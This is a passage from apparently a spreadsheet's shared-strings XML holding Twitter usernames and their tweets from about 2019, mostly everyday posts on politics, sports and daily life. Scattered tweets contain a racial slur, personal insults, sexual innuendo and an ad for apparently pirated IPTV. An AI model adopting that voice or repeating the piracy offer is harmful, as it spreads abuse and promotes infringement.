    <t>katsop62</t>
  </si>
  <si>
    <t>@DerbyChrisW The Barking MP has lost the plot again</t>
  </si>
  <si>
    <t>DepLAURAble75</t>
  </si>
  <si>
    <t>@LadyLibertyInEx @charliekirk11 What happened here? This was no a/v mishap. The golf clubs? Really? We deserve answers.</t>
  </si>
  <si>
    <t>Mangwala1</t>
  </si>
  <si>
    <t>@JonTheDon_ She’s also studying, her degree is health administration, she’s in her third year and in her interviews she said she’s going to open assisted living facilities.</t>
  </si>
  <si>
    <t>BrandiBeats</t>
  </si>
  <si>
    <t>When you’re really down and depressed and you can’t seem to force yourself to do anything you enjoy. That’s me.</t>
  </si>
  <si>
    <t>blackmarketkarm</t>
  </si>
  <si>
    <t>My ( @StanBelton ) attempt at drawing the perfect studio location... https://t.co/e9L94yaSbH</t>
  </si>
  <si>
    <t>Senoj_EkimBPM</t>
  </si>
  <si>
    <t>@Delcasmarii @ChadButlerJr We don't like him because the nigga is ignorant and he sucks</t>
  </si>
  <si>
    <t>fdaixo</t>
  </si>
  <si>
    <t>@mem_xox Word to curb 😭</t>
  </si>
  <si>
    <t>TRBTStevenson</t>
  </si>
  <si>
    <t>@nickymca_nicky @scooterbraun California has the most gun control laws, have you ever thought about increasing and helping people get access to mental health? You realize someone just committed a mass murder in Japan by fire bombing the building. If someone wants to kill people they will.</t>
  </si>
  <si>
    <t>madiryanne</t>
  </si>
  <si>
    <t>God continues to bless me in the most wonderful ways I’m so grateful for him 💓</t>
  </si>
  <si>
    <t>The Meaning of Life https://t.co/NK2uYNwtsQ | #tokenmarket #southaustralia #cleveland #saltlakecity #investment #minneapolis #sydney #blockchain #boston #seattle #perth #neworleans #london #icotracker #newyork #albuquerque #investment #ico #stratis #nashville #privateequity #ico https://t.co/bNrf0V3z38</t>
  </si>
  <si>
    <t>dolphinslvr2002</t>
  </si>
  <si>
    <t>So good I had to share! Check out all the items I'm loving on @Poshmarkapp from @poshmishmosh @adjiscloset #poshmark #fashion #style #shopmycloset #cato #bp #izod: https://t.co/R5APoOelBJ https://t.co/cEf5P7Eslz</t>
  </si>
  <si>
    <t>sandrajeffery1</t>
  </si>
  <si>
    <t>@southern_kath @AnnaSoileau3 Love the new pic Anna.❤😊</t>
  </si>
  <si>
    <t>pipkinxchaos</t>
  </si>
  <si>
    <t>Do you ever just need to drop everything and go get a tattoo asap</t>
  </si>
  <si>
    <t>CarlKarlburg</t>
  </si>
  <si>
    <t>@DogginTrump @realDonaldTrump What planet are you on? Must be the CNN PLANET.</t>
  </si>
  <si>
    <t>AmadiXChange9</t>
  </si>
  <si>
    <t>Your obsession with excellence is palpable today. You put the ... More for Libra https://t.co/e3OVgaP5qp</t>
  </si>
  <si>
    <t>BirdieCaine</t>
  </si>
  <si>
    <t>@angela_tenorioo She gon get popped the next time now https://t.co/eTdiHBCfl6</t>
  </si>
  <si>
    <t>Don1958</t>
  </si>
  <si>
    <t>@realDonaldTrump Quite the opposite. You are going to be impeached, right away, without mercy !!!</t>
  </si>
  <si>
    <t>ArticSkyFox</t>
  </si>
  <si>
    <t>🔴 LIVE NOW First time playing ARK!! What could go wrong? Let's find out together! Time to get into shananigans tonight! https://t.co/IdTlFCsr1i</t>
  </si>
  <si>
    <t>KDuke28</t>
  </si>
  <si>
    <t>Bound for @iowaspeedway!!</t>
  </si>
  <si>
    <t>Positivethink66</t>
  </si>
  <si>
    <t>If you practice gratitude every day, it won’t take long before gratitude is your natural state of being, and when that happens you will have unlocked one of the greatest secrets of life.</t>
  </si>
  <si>
    <t>BarryBulat</t>
  </si>
  <si>
    <t>@realDonaldTrump We already know that you, being our racist-in-chief, approves of law enforcement inflicting cruel and unusual punishment on people of color, no need to keep flaunting your stupidity.</t>
  </si>
  <si>
    <t>LeonLittman</t>
  </si>
  <si>
    <t>@AriFleischer Some of people who went to their jobs and paid taxes are undocumented, Ari. Maybe you can acknowledge that.</t>
  </si>
  <si>
    <t>bennpeifert</t>
  </si>
  <si>
    <t>@OffTheRunTrades @vixologist @VolatilityWiz @Barton_options Yep, will cause some big moves for sure. But for example, had lunch last week with a friend from a large credit manager... they have raised funds on capital call basis that are predicated on exactly what you just said, to be the distressed buyer of downgrade-driven forced selling</t>
  </si>
  <si>
    <t>msTrandall</t>
  </si>
  <si>
    <t>Your social standing is vital to your success now. You might p... More for Scorpio https://t.co/khBpOJOC8E</t>
  </si>
  <si>
    <t>GrittyRock</t>
  </si>
  <si>
    <t>#NowPlaying Call It What It Is - Ben Harper &amp; The Innocent Criminals #Listen @BenHarper at https://t.co/NWeXAVwhvj #bluesrock #countryrock</t>
  </si>
  <si>
    <t>camanmore</t>
  </si>
  <si>
    <t>@amy_lou_e You and me both!</t>
  </si>
  <si>
    <t>girlsinyogapant</t>
  </si>
  <si>
    <t>Totally speechless of the view . . . . #leggings #girlsinleggings https://t.co/x816NSEZg0</t>
  </si>
  <si>
    <t>DTFortWorth</t>
  </si>
  <si>
    <t>The @LoneStarFilmSoc Sunday Cinema Series at @4daywkd is the perfect way to close out your weekend! Tonight's movie: Lonestar. The price: free! https://t.co/QfymxTc0g4</t>
  </si>
  <si>
    <t>SkyBetRacing</t>
  </si>
  <si>
    <t>🏇Check out the Sporting Life tip in the next race at Ascot... 1. Dubai Paradise 2. Queen Daenerys 3. Reehaam 📱Bet and watch on the Sky Bet app.</t>
  </si>
  <si>
    <t>andrewcferreira</t>
  </si>
  <si>
    <t>#WeirdScience is back on #TheShiftwithDrex tonight! I'm gonna talk about that asteroid that almost clobbered us last week, as well as the @haya2e_jaxa mission which somehow keeps getting cooler. Let me into your ear-holes at 11pm PT/2am ET, you won't regret it. Probably.</t>
  </si>
  <si>
    <t>SpiderLewin</t>
  </si>
  <si>
    <t>@LivEchonews Good job the headline mentioned what Football team he supported! Top journalism right there 👍🏻</t>
  </si>
  <si>
    <t>RIPMLiberal</t>
  </si>
  <si>
    <t>@cnni Can they DNA the Trump family to see if they’re actually human?</t>
  </si>
  <si>
    <t>panhandleprims</t>
  </si>
  <si>
    <t>@MMFlint He’s 75 and more coherent than sniffling Trump ever could be..</t>
  </si>
  <si>
    <t>travie2shoes</t>
  </si>
  <si>
    <t>I got Adele a reallly long toy so she doesn’t get bored when I’m in the bathroom https://t.co/WRQbyzWF9B</t>
  </si>
  <si>
    <t>wnaphm</t>
  </si>
  <si>
    <t>idk what dental student needs to hear this but turn down your RPM</t>
  </si>
  <si>
    <t>naterusso_</t>
  </si>
  <si>
    <t>@AyoCaesar Go to work you dosser.</t>
  </si>
  <si>
    <t>HelenNickols</t>
  </si>
  <si>
    <t>@redskyatnight @Ludo_Parks I'm so sorry to hear this. I hope you enjoy running.. I'd cheer you - I think this is courageous!</t>
  </si>
  <si>
    <t>ceceayeobore</t>
  </si>
  <si>
    <t>@warriormama1019 @lorisstuff123 @prayingmedic @realDonaldTrump Seriously Trump is synonymous to failure.</t>
  </si>
  <si>
    <t>ColeyCrawler</t>
  </si>
  <si>
    <t>@SuperPuurr My bff is so ocd she can’t look at my phone ever. She deletes texts so once I respond she can’t remember what we were talking about lol. Yeah something is wrong with me. It ain’t right. I think messages are from group texts and they get pushed down so I can’t see. It’s bad</t>
  </si>
  <si>
    <t>lauraillustrate</t>
  </si>
  <si>
    <t>maybe some potential sticker/pin designs???? little drawings for now. https://t.co/3GysQpeDOK</t>
  </si>
  <si>
    <t>kin2souls</t>
  </si>
  <si>
    <t>Forget Mueller, Congress Needs to Interview the Real Author of the ‘Weissmann Report’ https://t.co/tSdnQzpIyg</t>
  </si>
  <si>
    <t>hetfli</t>
  </si>
  <si>
    <t>Hey Hetfli, do you still use bases sometimes for poses or do you automatically already know how you’re going to d… — fun fact I actually rarely if at all used bases or references when I drew! I still don’t but any aspiring artists… https://t.co/U8WrZvXvUR</t>
  </si>
  <si>
    <t>TippersSimon</t>
  </si>
  <si>
    <t>@TonyJHopkinson @jeremycorbyn We need a minimum wage to stop employers exploting workers for profit it has nothing to do with competitiveness or otherwise</t>
  </si>
  <si>
    <t>Truthwsuf</t>
  </si>
  <si>
    <t>@KamVTV @jaimeleelord It's the race card. They don't leave home without it.</t>
  </si>
  <si>
    <t>ToddForman3</t>
  </si>
  <si>
    <t>Hey Welcome To The Resistance 😎(@knowitalldan), thank you for following me</t>
  </si>
  <si>
    <t>LostLeanore</t>
  </si>
  <si>
    <t>@RealDrVenkman have you seen some of the shit that other artists pay to have slapped together for them?? compared to some of those... it is INDEED the ENTIRE ass. LOL</t>
  </si>
  <si>
    <t>angiecceleste</t>
  </si>
  <si>
    <t>@MylesParrish wish i had a switch to join mario kart mondays 😤</t>
  </si>
  <si>
    <t>ESAssessKS1and2</t>
  </si>
  <si>
    <t>@MissStanleyYr6 @WritingRocks_17 3/3 Surely it is better to use rich texts to find great examples of strong choices, discuss them and then get the children to apply in their own writing? Admittedly, not a 'quick' fix but better teaching and learning! PLEASE, PLEASE stop teaching to that stupid test.</t>
  </si>
  <si>
    <t>paul_orourke</t>
  </si>
  <si>
    <t>@JasonIsbell Hi Jason. Will Amanda be playing with you for the show in Winnipeg in August</t>
  </si>
  <si>
    <t>NotHKwest</t>
  </si>
  <si>
    <t>Sweating for no reason kmt</t>
  </si>
  <si>
    <t>TheRachelFisher</t>
  </si>
  <si>
    <t>@rebeinstein @JRubinBlogger Did she watch the same debate?</t>
  </si>
  <si>
    <t>Casper10666</t>
  </si>
  <si>
    <t>@MrTCHarris @Dentakesthebus @KieranPAndrews No it was people of Scotland supporting Scotland. You always fall for that its all SNP...its not. https://t.co/aFlvWxYTXx</t>
  </si>
  <si>
    <t>ArtistRobinson1</t>
  </si>
  <si>
    <t>Great day watching the eventing @rebecafarms #horses #eventing #MT #summerfun @ Kalispell, Montana https://t.co/2YERGeW8Pe</t>
  </si>
  <si>
    <t>the_drool</t>
  </si>
  <si>
    <t>@TVAmy Trouble on the Horizon</t>
  </si>
  <si>
    <t>HollywoodBowlUK</t>
  </si>
  <si>
    <t>Hi @badberni1982x we're sorry to hear you're still awaiting contact, please could you DM us with your contact details and further details regarding your refund so we can investigate this further? Thanks, Ben</t>
  </si>
  <si>
    <t>JulieDby_PhD</t>
  </si>
  <si>
    <t>There was a spider on my pillow and it disappeared</t>
  </si>
  <si>
    <t>MicheleAmerica2</t>
  </si>
  <si>
    <t>@texlatina For Me Never- it’s against my Religion</t>
  </si>
  <si>
    <t>OSMOSISCon</t>
  </si>
  <si>
    <t>Meet more of the 2019 Bits and Bytes Speakers - https://t.co/qHJLNLRHRs https://t.co/ldYIegHtc6</t>
  </si>
  <si>
    <t>MichaelADLyons</t>
  </si>
  <si>
    <t>@YahooSportsNBA This twot sandbagged his exit out and will always be known as the guy who purposely dogged it to get traded. Unforgettable. Please Masi, don’t donit. @Raptors</t>
  </si>
  <si>
    <t>hustla_bb</t>
  </si>
  <si>
    <t>@TheWinterLOL @Kyle_Fox17 @itswoori Thanks for this post. Now having a mid life crisis 😭</t>
  </si>
  <si>
    <t>BizNetSC</t>
  </si>
  <si>
    <t>@Microsoft TODAY A PAKISTANI OR INDIAN SOURCE HACKED MY COMPUTER &amp; FROZE IT UP FOR 3 HRS. THEY SAID THEY WERE CALLING FROM MICROSOFT - EVEN HAD YOUR LOGO. IT WAS A SCAM TRYING TO SELL YOUR SOFTWARE PROTECTION FOR $400. WHAT ARE YOU DOING TO STOP THIS BREACH OF PRIVACY?</t>
  </si>
  <si>
    <t>vesuvianvomit</t>
  </si>
  <si>
    <t>Honey bee populations declined by more than 40% last year. Tell @USDA to restore funding for the Honey Bee Colony survey! https://t.co/nzsxO21zoo @CFSTrueFood #protectpollinators #savebees https://t.co/5P38mahCGt</t>
  </si>
  <si>
    <t>NEVIE_JOHN</t>
  </si>
  <si>
    <t>@AstronautAbby ...@astro_luca just passed over below the Ausyralian Continent. Pass would have been Good Visibility from My Location, except for ight Cloud Cover, and Nearby Houses blocking my view. #SpotLUCAonISS2019</t>
  </si>
  <si>
    <t>AndyPhotography</t>
  </si>
  <si>
    <t>@DickieMeaden @NeilosCarey @harrismonkey Barry and Paul Chuckle</t>
  </si>
  <si>
    <t>GatodeMiel</t>
  </si>
  <si>
    <t>@AMarch8314 @oweniverson @PressSec @realDonaldTrump I don’t subscribe to the sky god.</t>
  </si>
  <si>
    <t>AWmedia1</t>
  </si>
  <si>
    <t>If you own either of the following devices you could save a fortune on your TV bills. #iptv #football * Amazon firestick * LG or Samsung Smart TV For £50 a year you can get ALL SPORTS, MOVIES, ENTERTAINMENT AND PPV BOXING. ITS LIKe A FULL PACKAGE YOU GET FROM SLY DM for trial https://t.co/j2MUduGhet</t>
  </si>
  <si>
    <t>Eddied80</t>
  </si>
  <si>
    <t>@Kil889 These days it's nothing to lose, because you didn't pay for it anyway</t>
  </si>
  <si>
    <t>sc5121</t>
  </si>
  <si>
    <t>@IL0VEthe80s There was quite a few I disliked but the one that stands out is Double Dutch Bus. https://t.co/09hiQvrvhs</t>
  </si>
  <si>
    <t>ManthonyCourant</t>
  </si>
  <si>
    <t>Ryan Carroll and Khyon Gillespie academically ineligible; Edsall says neither will play this season.</t>
  </si>
  <si>
    <t>Purple1382</t>
  </si>
  <si>
    <t>@JavierV60262378 Yeah well I said the same, have a nice day</t>
  </si>
  <si>
    <t>Think_Simplicit</t>
  </si>
  <si>
    <t>Wow - looks like the roads in Virginia aren't the only thing getting a lot of traffic! #Hospitality #Hotel #PBX #Telecom #ThursdayThoughts https://t.co/2OJAuuvx9E</t>
  </si>
  <si>
    <t>LeslieHalleck</t>
  </si>
  <si>
    <t>I've been busy with the #radiotour for #PlantParenting. Here's the link to listen to my interview with Chris Oakes on WFIN @GoodMornings : https://t.co/rBZdELEv8U https://t.co/0aRxgFuqsv</t>
  </si>
  <si>
    <t>dgdobie</t>
  </si>
  <si>
    <t>@batkoanarkhiya @LivvyFanon As far as I know, she claims to have intel that proves that Russia supported the campaign of Bernie and trump. She thinks that this means that Bernie is a Kremlin asset, but this is a huge leap of logic, if it has any truth to it.</t>
  </si>
  <si>
    <t>YasinBojang</t>
  </si>
  <si>
    <t>Praying for all you underground users. Especially the central line people 🙆🏾‍♀️</t>
  </si>
  <si>
    <t>SuperbiaProeIia</t>
  </si>
  <si>
    <t>Phil Foden: "It's going to be a shame. I'm not thinking about that too much because I don't want it to happen. He's here now so let's try and be happy..." https://t.co/41LWYcw114</t>
  </si>
  <si>
    <t>JayYarid</t>
  </si>
  <si>
    <t>Fog, rain and snow can confuse a self-driven vehicle's sensors. Read more: via @WIRED #technology #AI #UK https://t.co/RW3Tx2Vpqt https://t.co/Dfi2DVNdH2</t>
  </si>
  <si>
    <t>Travis_Wayne_L</t>
  </si>
  <si>
    <t>@MaddieJensen Says the girl who was over the Bachelorette 5 weeks ago.</t>
  </si>
  <si>
    <t>serrinalam</t>
  </si>
  <si>
    <t>@KCONUSA2019 @lilixn_txan @MacyTahTaecy I just want YEOJIN TO KNOW FROGS ARE LOVED TOO RIBBIT 🐸</t>
  </si>
  <si>
    <t>zcleghern</t>
  </si>
  <si>
    <t>@brjma @BradSchrag @KeillerDon sure thing. i definitely believe you did the research and put more work into it than anyone else studying the issue</t>
  </si>
  <si>
    <t>MicronautCA</t>
  </si>
  <si>
    <t>Should We Stop Keeping Pets? - The Guardian - Pocket https://t.co/6aqFoQddw3</t>
  </si>
  <si>
    <t>tessamag</t>
  </si>
  <si>
    <t>its actually nicer listening to them in a way bc i tend to read very fast and miss details so now that I have this slow old man reading them to me I'm getting a lot more out of it!!!</t>
  </si>
  <si>
    <t>nickon1055</t>
  </si>
  <si>
    <t>@JohnJCrace That’ll sort out the transport and logistics for a no deal Brexit then...</t>
  </si>
  <si>
    <t>rcdutcher</t>
  </si>
  <si>
    <t>@lukerumley @dodgejd @BlackTruckMedia That's exactly what I did. He was literally asking for a friend 😉</t>
  </si>
  <si>
    <t>jscukanec</t>
  </si>
  <si>
    <t>They won’t let you in the ring from Madison Square Garden at the @BoxingHall but you can ring the bell... “Ding...Ding” https://t.co/koFzB2qpTS</t>
  </si>
  <si>
    <t>RobertFlury1</t>
  </si>
  <si>
    <t>@KarenCampbellTV @WTHRcom Wishing you the best of luck 💜</t>
  </si>
  <si>
    <t>dutchhulen</t>
  </si>
  <si>
    <t>@InThierry She can go to hell.</t>
  </si>
  <si>
    <t>signifyd</t>
  </si>
  <si>
    <t>Congratulations to digital agency @BlueAcorniCi for winning @Signifyd first ever FLOW partnership award! We recognized Blue Acorn for creating outstanding #CX for #ecommerce consumers https://t.co/vB25K36nu1 https://t.co/76LrB08gUp</t>
  </si>
  <si>
    <t>HornigCynthia</t>
  </si>
  <si>
    <t>So Mr Mueller, why did you need IG to tell us you got rid of incriminating texts from Page to her Lover? WERE YOU AWARE THERE WERE THREATS TO @realDonaldTrump LIFE?</t>
  </si>
  <si>
    <t>lp5150</t>
  </si>
  <si>
    <t>@TheSilentLOUD @LaWilson2006 @realDonaldTrump Show us the money @RepCummings !! In fact, every city who received this money better pray they used it properly.</t>
  </si>
  <si>
    <t>jackie3boys</t>
  </si>
  <si>
    <t>With the right #decor, you can make a kid's playroom stylish. #homedesign https://t.co/fdWhf6kW8F https://t.co/UOB9RZMwil</t>
  </si>
  <si>
    <t>SmithDems</t>
  </si>
  <si>
    <t>Mueller tells House panel Trump asked staff to falsify records #MuellerHearings #TrumpLies https://t.co/trRjVyIFqL</t>
  </si>
  <si>
    <t>goftyler</t>
  </si>
  <si>
    <t>This is a story we've all read/seen before--but never with such peculiar, creepy detail, such candid delivery, and in such a short, hot space. @KaraVernor never lets us down. https://t.co/4qCR8e8qfD</t>
  </si>
  <si>
    <t>NJCUBANO</t>
  </si>
  <si>
    <t>If anyone needs a ride next week to @EliteTGaming 18 event on August 3rd and are on the way shoot me a dm. Myself and @zeus_NJ are pulling up!</t>
  </si>
  <si>
    <t>CHEE5EM4N</t>
  </si>
  <si>
    <t>Bruce’s first trip to @ForbiddenPlanet. https://t.co/1EfqxOztJ8</t>
  </si>
  <si>
    <t>abcactionnews</t>
  </si>
  <si>
    <t>An Amazon delivery driver stole a Texas couple's dog and tried to sell it online, police say https://t.co/5LuPZMnqy6 https://t.co/BIPf1XrXcu</t>
  </si>
  <si>
    <t>WileyTweets</t>
  </si>
  <si>
    <t>@repdinatitus @RepCummings All you got. Go to Baltimore see for your self. Short drive from D C.</t>
  </si>
  <si>
    <t>90sTalha</t>
  </si>
  <si>
    <t>@MudsMunch Facts, Advice from the heart lands in the heart, even if you dont see the person take it on board instantly it surely sparks a fire inside. However advice from the ego always attacks the ego</t>
  </si>
  <si>
    <t>metalfacej</t>
  </si>
  <si>
    <t>Don’t forget we was both in the gutter, i got paper and stayed the same, you get paper and switch up, it’s all love, but luck runs out</t>
  </si>
  <si>
    <t>ozment_kevin</t>
  </si>
  <si>
    <t>@SwampyTrump @SaundraHarbiso1 @DonaldJTrumpJr @realDonaldTrump Sandra's seems a bit triggered and illiterate, sucks to be a MAGAt.</t>
  </si>
  <si>
    <t>Michelle39WW</t>
  </si>
  <si>
    <t>🥗 🥩 When you have leftover steak from dinner, you make steak salad for lunch. This piece of NY Strip made a great salad for 4 SP (my homemade 1000 Island was another 2 SP) What do you make with your… https://t.co/Rsrdfxdmw8</t>
  </si>
  <si>
    <t>ohnoanime</t>
  </si>
  <si>
    <t>Season 3 of Oh no, Anime! Radio has OFFICIALLY BEGUN with my mix from this year’s Lucky Lotus online music festival! I’ve got some amazing guests lined up this season and I’m so so excited. Let’s get into it!! https://t.co/3ajCG6pmck</t>
  </si>
  <si>
    <t>D_Money_52</t>
  </si>
  <si>
    <t>@RIFAYAYO Don’t shake the table too hard! Lol</t>
  </si>
  <si>
    <t>HSugarCookie</t>
  </si>
  <si>
    <t>@MissWarmJ You have one of my favourite booties on the whole internet and that’s a fact</t>
  </si>
  <si>
    <t>ColchCannons_Vt</t>
  </si>
  <si>
    <t>Brattleboro spins a 5-4-3 DP to end the 5th inn. Post 5 leads, 9-0. #vtlegion</t>
  </si>
  <si>
    <t>virtualsk8er</t>
  </si>
  <si>
    <t>i don’t listen to mac as much anymore after he passed bec listening to his voice knowing he’s gone just shreds my heart</t>
  </si>
  <si>
    <t>RAWisPHUONG</t>
  </si>
  <si>
    <t>Saw Young Thug is coming to Philly. Saw he’s on tour with Machine Gun Kelly. JEFFERY... https://t.co/Yz5OrSmpsU</t>
  </si>
  <si>
    <t>cathleenschine</t>
  </si>
  <si>
    <t>Could someone please calculate the environmental damage that many straws will do? Trump Campaign Says Straws Brought In Almost $500K In Ten Days https://t.co/Kh6QB3Fqub via @TPM</t>
  </si>
  <si>
    <t>ImprobableJoe</t>
  </si>
  <si>
    <t>@MockRamblings THANKS!! I just need to cut a cord out of a picture so we can get a fancy print done.</t>
  </si>
  <si>
    <t>Mcobbin96</t>
  </si>
  <si>
    <t>Rumor has it Money Mae has already sacked off Tommy, you love to see it #LoveIsland</t>
  </si>
  <si>
    <t>WorkSurpriseAZ</t>
  </si>
  <si>
    <t>JOB: Phoenix AZ USA - Lab Technician - Bachelor's degree in biochemistry chemistry or related field : Bachelor's degree in biochemistry chemistry or related field AND two years lab experience OR Any equivalent combina JOBS SURPRISE AZ https://t.co/16pWdAjGe2</t>
  </si>
  <si>
    <t>JamesEdgarSkye</t>
  </si>
  <si>
    <t>@KristenRoedel Those are my thoughts. This novel I am editing my first draft is just too large for a indie or self-Publishing. Traditional seems the right route at this moment.</t>
  </si>
  <si>
    <t>85Chevy_Monte</t>
  </si>
  <si>
    <t>Crazy how someone can bring so much ease to you and irritate you at the same time haha</t>
  </si>
  <si>
    <t>ashelizabethm11</t>
  </si>
  <si>
    <t>Yesterday my patient’s son walks up to me &amp; says “you know this is nothing like the TV shows, it’s so quiet up here &amp; you guys just sit around” Yes sir you’re right, I’ll keep that in mind while I’m running around keeping your mom comfortable</t>
  </si>
  <si>
    <t>biskitwythtee</t>
  </si>
  <si>
    <t>@Con_undrum You!!!!!!! You are the enemy!!!!!!!!!</t>
  </si>
  <si>
    <t>PamMLR</t>
  </si>
  <si>
    <t>You know you’re fucked up when the Vick’s doesn’t even help. Abuela....Mamí... ¿qué hago ahora?😂</t>
  </si>
  <si>
    <t>rhbBSE</t>
  </si>
  <si>
    <t>@sueB63932227 @greateranglia They did warn everyone a lot, there simply aren’t enough buses sitting idle to cover an extreme event like a heatwave what else could they do 🤷‍♀️ https://t.co/POyJIGKtt9</t>
  </si>
  <si>
    <t>ItsDonAllen</t>
  </si>
  <si>
    <t>@JimSterling The fact it interrupts your gameplay to tell you you can't use online features when you lose connection is worse. Especially because it doesn't even have online multiplayer. (not my video) https://t.co/H3ms8xyz5b</t>
  </si>
  <si>
    <t>SJDoerr</t>
  </si>
  <si>
    <t>@PhxRisingNation @SweetLou8084 @prfcfanshow @RisingTactics @ElevenRising Like jack and coke</t>
  </si>
  <si>
    <t>SSNscotland</t>
  </si>
  <si>
    <t>42nd Macaulay Lecture - Green and Prosperous Land will be taking place on 2 October in Edinburgh. This year, attendees will hear from Professor of Economics, Dieter Helm from University of Oxford. Tickets available now - https://t.co/tWZLXr5eff</t>
  </si>
  <si>
    <t>BlipBlipBlue</t>
  </si>
  <si>
    <t>One of these days blipbot is going to get her own twitter and on that day i might just die.</t>
  </si>
  <si>
    <t>lgoldst</t>
  </si>
  <si>
    <t>Donald Trump and @senatemajldr are un-American and anti-America. #TrumpIsARacistRat #MoscowMitch #ImpeachmentInquiryNow #MoscowMitchUnAmericanTraitor #MoscowMitchMctreason</t>
  </si>
  <si>
    <t>_ekm18</t>
  </si>
  <si>
    <t>@Kennedy_hh happy birthday honey!!! hope you have the best day, love you tons 💗🤩🥂</t>
  </si>
  <si>
    <t>Balbuena0202</t>
  </si>
  <si>
    <t>I just finished The Newsroom 🙃 how am I supposed to live without this show that hasn’t been aired since 2014</t>
  </si>
  <si>
    <t>JakeCrocker</t>
  </si>
  <si>
    <t>The Mayor is our Rotary Club of Richmond luncheon speaker today. These questions should get interesting — attending Rotary Luncheon with Levar Stoney, Mayor of Richmond at Willow Oaks Country Club https://t.co/nmwJgNAI5O</t>
  </si>
  <si>
    <t>StephenMorbey2</t>
  </si>
  <si>
    <t>Always missed and never forgotten about will stay in my heart forever until the day we both die but for now I'm going to enjoy life football and mainly look for Jess cause miss so much I which she still be in my life forever no matter what happens to both of us I will always care</t>
  </si>
  <si>
    <t>Dugefreshness</t>
  </si>
  <si>
    <t>@StormgradGames @HWargaming @Daemon_Hammer I bought some testors model master matte clear coat and it works pretty nicely. It's the first first brand I've tried so nothing to compare to.</t>
  </si>
  <si>
    <t>yahoo201027</t>
  </si>
  <si>
    <t>And...down goes that guy. Here enter the new bad guy in the chat...and he already know that Konohamaru is watching over. #Boruto #Toonami #BlogAllTheTime</t>
  </si>
  <si>
    <t>uhmelia_</t>
  </si>
  <si>
    <t>show me the cheese and i’ll spread these knees</t>
  </si>
  <si>
    <t>afspnational</t>
  </si>
  <si>
    <t>July is #MinorityMentalHealthMonth. We are excited to join @HRC on Monday, July 29, for a #MMHMChat to discuss the challenges and barriers to seeking mental health care and support in LGBTQ communities of color. Your story matters, and you are not alone. https://t.co/qwvzY08xDX</t>
  </si>
  <si>
    <t>Foxfieldguy</t>
  </si>
  <si>
    <t>Second GOP congressman in two days decides to quit https://t.co/uftx678RJ4</t>
  </si>
  <si>
    <t>HBluegem</t>
  </si>
  <si>
    <t>Since I'm deciding to take my Gaming/Production channel into something bigger, I'm going to say this: I'm going to need some RP players, Music Composers/singers (with permission), creators, more artists, people who do voices, writers and/or whatever you're good at!</t>
  </si>
  <si>
    <t>DrBleafs</t>
  </si>
  <si>
    <t>@SterlingRadio What kinda real food do they have at a fair/carnival? Taste of Chicago was only thing I went to as a kid. Don’t remember food at parking lot carnivals (except cotton candy, but not a fan) But 🌽 🌽 🌽 😋 w lots of butter!</t>
  </si>
  <si>
    <t>Ianpgary</t>
  </si>
  <si>
    <t>“What #Mauritius is providing is not a gateway but a getaway car for unscrupulous corporations dodging their tax obligations,” said @alvinmosioma , executive director of @TaxJusticeAfric https://t.co/IQC3tWlqmo via @icijorg</t>
  </si>
  <si>
    <t>FenixPowerCo</t>
  </si>
  <si>
    <t>@TomMillsJax @JenniferSensiba @jasonfenske13 Also handy: remembering when a driver prefers higher regen. (having to set it every time, really @nissan?)</t>
  </si>
  <si>
    <t>queensmereo</t>
  </si>
  <si>
    <t>Who’s side will you choose?! 👀 Pick either zombies or aliens in our Gaming Summer Nerf Event on Saturday 3rd August! Plus there will be free zombie and alien face painting from 10am-4pm! 🚀 Register for your free time slot here: https://t.co/A8bqeYycEx https://t.co/tbuT3Y4EgV</t>
  </si>
  <si>
    <t>MatthewACherry</t>
  </si>
  <si>
    <t>The African American community getting ready to bear arms with Sweden over A$AP Rocky https://t.co/6lTIixRtAc</t>
  </si>
  <si>
    <t>cca_calcricket</t>
  </si>
  <si>
    <t>CCA under 10 team is playing @HHTCC2014 today. The little kids from California are getting a glimpse of unpredictable English weather conditions. CCA’s Vivaan and Chaitanya scored 50s. The team is doing a good job in bowling and fielding. Good luck, CCA! https://t.co/KWMOs3Ze5r https://t.co/ukmqn8txlz</t>
  </si>
  <si>
    <t>TrippyCusp93</t>
  </si>
  <si>
    <t>I entered to win @hemp_worx #CBD oil #giveaway https://t.co/HvgmfPj1Kb</t>
  </si>
  <si>
    <t>CarrieNauseda</t>
  </si>
  <si>
    <t>@Xoxoxoxo1623 Yes! Yes! and Yes! agreed with all!</t>
  </si>
  <si>
    <t>liliknits</t>
  </si>
  <si>
    <t>@AndyGoldi @MysterySolvent Looks more like the tool they use for a colonoscopy😁</t>
  </si>
  <si>
    <t>Brett_Calabasas</t>
  </si>
  <si>
    <t>@DufferMO @NPCserpent @AnnCoulter @thedailybeast That doesn’t invalidate my argument.🙄 it’s not a site that promotes “white supremacy”. Why don’t you forward content that offends you, and report it to Twitter? Same goes for Ann Coulter posts. I guarantee you Twitter would throw them both off this platform, if they had cause.</t>
  </si>
  <si>
    <t>andersonsgrain</t>
  </si>
  <si>
    <t>In this week's crop update, Product Specialist Jessica Link and Senior Sales Representative Seth Miller discuss soybean disease pressure and grain market considerations with the upcoming Supply and Demand report. https://t.co/RmbKbeZRnR — #corn #soybeans #grow19 https://t.co/37Wao6k37j</t>
  </si>
  <si>
    <t>Masolo92K</t>
  </si>
  <si>
    <t>@CorinneClaire_ Food carrots,Celery and lots of dranks 😂😂😂</t>
  </si>
  <si>
    <t>MonsterCa</t>
  </si>
  <si>
    <t>@tyrasux We know that you know you're going to nail it, Tyra. But let's stack the deck, anyway. If you want to get in some last-minute prep, these are the most-asked interview questions: https://t.co/1EcyBrQJbq Good luck out there! ^JP</t>
  </si>
  <si>
    <t>ZachPL</t>
  </si>
  <si>
    <t>@AnthonyRieber looking like yankees going to be a .250 team for the rest of the season</t>
  </si>
  <si>
    <t>EliTheBeast</t>
  </si>
  <si>
    <t>@OG_vot @FreeSpiritTee I ain’t paying for Nathaniel. Unless I see you as wifey material 🤣</t>
  </si>
  <si>
    <t>MicrobLog_me_uk</t>
  </si>
  <si>
    <t>@ABsteward @pewhealth Assuming of course the #MDRO is from a sterile site. Infection, not colonisation.</t>
  </si>
  <si>
    <t>naomipeck74</t>
  </si>
  <si>
    <t>@MarianKeyes I got soaked yesterday in Dublin, and had to wear a sweatshirt! It was fab.</t>
  </si>
  <si>
    <t>camt33</t>
  </si>
  <si>
    <t>@Vitricate Kd and boogie to the warriors wasn’t bad 4 the league tho 😴</t>
  </si>
  <si>
    <t>CarefreeFooty</t>
  </si>
  <si>
    <t>@FtblJames_ Sometimes we have to go backwards to go forwards, stay positive dude! 🤙</t>
  </si>
  <si>
    <t>bbottlbutterfly</t>
  </si>
  <si>
